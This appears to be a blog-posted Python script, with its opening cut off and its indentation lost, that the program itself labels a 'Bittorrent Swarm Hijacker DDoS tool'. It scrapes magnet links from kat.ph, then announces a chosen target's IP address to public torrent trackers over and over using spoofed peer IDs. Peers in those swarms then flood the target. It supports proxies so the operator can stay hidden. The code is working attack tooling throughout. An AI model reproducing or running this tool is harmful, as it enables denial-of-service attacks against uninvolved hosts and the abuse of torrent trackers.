for tracker in copy.copy(ctx['trackers'].data):
if tracker in ctx['blacklist']:
continue
for ih in copy.copy(ctx['trackers'][tracker]):
if ih in ctx['bad_ih']:
continue
def f():
ctx['tries'] += 1
qs['info_hash'] = ih
qs['peer_id'] = ctx['peer_id']()
qs['ip'] = socket.gethostbyname(ctx['host'])
resp = ctx['get_url']('%s?%s'%(tracker,urlencode(qs)))
if resp is None:
return
try:
resp = ctx['decode'](resp)
except:
return
if 'failure reason' in resp:
ctx['error']('Tracker Announce Failed: %s'%resp['failure reason'])
return
elif 'warning message' in resp:
ctx['error']('Tracker Warning: %s'%resp['warning message'])
return
ctx['success'] += 1
ctx['fork'](f)
ctx['sleep'](.5)
except:
pass
def _stats_loop(ctx):
while ctx['on']:
s = ctx['success']
f = ctx['fails']
a = ctx['tries']
if f+s > 0:
ctx['log']('%d / %d / %d (%f %% success)'%(s,f,a,100*(float(s)/float(f+s))))
ctx['sleep'](10)
def _mainloop(ctx):
"""
Mainloop
"""
ctx['fork'](ctx['finder_loop'])
ctx['fork'](ctx['stats_loop'])
while ctx['on']:
ctx['fork'](lambda : ctx['inject']())
ctx['sleep'](60)
def _log(ctx,m):
ctx['log_lock'].acquire()
m = str(m)
for p in m.split('\n'):
print ('[+] %s'%p.strip())
ctx['log_lock'].release()
def _error(ctx,m):
ctx['log_lock'].acquire()
m = str(m)
for p in m.split('\n'):
print ('[-] %s'%p.strip())
ctx['log_lock'].release()
def _fork(func):
try:
threading.Thread(target=func,args=()).start()
except:
ctx['print_error']()
def _find_torrents(ctx,page_data):
"""
given html, find all magnet links with at least 1 http based tracker announce url
add new entries found to list to announce with
"""
if page_data is None:
ctx['error']('No Data given to torrent finder')
return
bs = BS(page_data)
if bs is None:
ctx['error']('Failed to Parse page data of length %d'%len(page_data))
return
for link in bs.find_all('a'):
text = link.get('href')
if text is None or len(text) == 0:
continue
if text.startswith('magnet:?xt=urn:btih:'):
data = text.split(':')[3]
for tracker in data.split('&')[2:]:
tracker = unquote(tracker.split('=')[1])
if not tracker.startswith('http://'):
continue
if tracker not in ctx['trackers']:
ctx['trackers'][tracker] = dict()
infohash = ctx['infohash_to_bytes'](data.split('&')[0])
if infohash not in ctx['trackers'][tracker]:
ctx['trackers'][tracker][infohash] = ''
def _get_url(ctx,url):
"""
Do an HTTP GET request with given a url
"""
try:
if not url.startswith('http://'):
ctx['error']('%s is not an http url'%url)
return
if 'proxies' in ctx:
resp = requests.get(url,proxies=ctx['proxies'],headers={'User-Agent':''})
else:
resp = requests.get(url,headers={'User-Agent':''})
if resp is not None and resp.text is not None and resp.status_code == 200:
return resp.text
elif resp is not None and resp.status_code != 200:
if not resp.status_code >= 500:
ctx['error']('HTTP %s'%resp.status_code)
except:
pass
ctx['fails'] += 1
def _finder_loop(ctx):
while ctx['on']:
ctx['scrape_torrents']()
ctx['sleep'](3000)
def _infohash_to_bytes(ih):
ret = ''
for n in range(len(ih)/2):
ret+=binascii.a2b_hex(b'%s'%ih[n*2:(n*2)+2])
return ret
def _do_find_torrents(ctx):
ctx['log']('Updating Torrent DB')
ctx['blacklist'] = locking_dict()
ctx['bad_ih'] = locking_dict()
for url in ctx['urls']:
ctx['fork'](lambda : ctx['find_torrents'](url))
ctx['sleep'](1)
def _rand(l,chars='1234567890'):
ret = ''
for n in range(l):
ret += chars[random.randint(0,len(chars)-1)]
return ret
def init(ctx):
ctx['on'] = True
ctx['log'] = lambda m: _log(ctx,m)
ctx['error'] = lambda m: _error(ctx,m)
ctx['log_lock'] = threading.Lock()
ctx['blacklist'] = locking_dict()
ctx['trackers'] = locking_dict()
ctx['bad_ih'] = locking_dict()
ctx['success'] = 0
ctx['tries'] = 0
ctx['decode'] = hunnyb.decode
ctx['finder_loop'] = lambda : _finder_loop(ctx)
ctx['stats_loop'] = lambda : _stats_loop(ctx)
ctx['infohash_to_bytes'] = _infohash_to_bytes
ctx['peer_id'] = lambda : '-TR2720-%s'%_rand(12)
ctx['inject'] = lambda : _announce(ctx)
ctx['mainloop'] = lambda : _mainloop(ctx)
ctx['get_url'] = lambda url : _get_url(ctx,url)
ctx['scrape_torrents'] = lambda : _do_find_torrents(ctx)
ctx['find_torrents'] = lambda url : _find_torrents(ctx,ctx['get_url'](url))
ctx['print_error'] = lambda : ctx['error']('ERROR: %s'%traceback.format_exc())
ctx['fork'] = _fork
ctx['fails'] = 0
ctx['sleep'] = time.sleep
if 'proxies' in ctx:
ctx['log']('Using Proxy: %s'%ctx['proxies']['http'])
else:
ctx['log']('!!! Using No Proxy !!!')
if __name__ == '__main__':
import argparse, sys, os
p = argparse.ArgumentParser(description='Bittorrent Swarm Hijacker DDoS tool thingy')
p.add_argument('--proxy',help='http proxy to use')
p.add_argument('host',help='hostname or ip address of the target to attack')
p.add_argument('port',help='tcp port to attack the target on')
args = p.parse_args()
if not hasattr(args,'host') or not hasattr(args,'port'):
p.print_usage()
sys.exit(0)
urls = []
for url in ['http://kat.ph/movies/','http://kat.ph/music/','http://kat.ph/anime/','http://kat.ph/books/' ]:
for n in range(3):
urls.append('%s%d/'%(url,n+1))
ctx = {
'host':args.host,
'port':args.port,
'urls':urls
}
if args.proxy is not None:
ctx['proxies'] = {'http':args.proxy}
init(ctx)
try:
ctx['mainloop']()
except KeyboardInterrupt:
ctx['log']('Interrupted')
os.abort()
except:
ctx['print_error']()
Subscribe to:
Posts (Atom)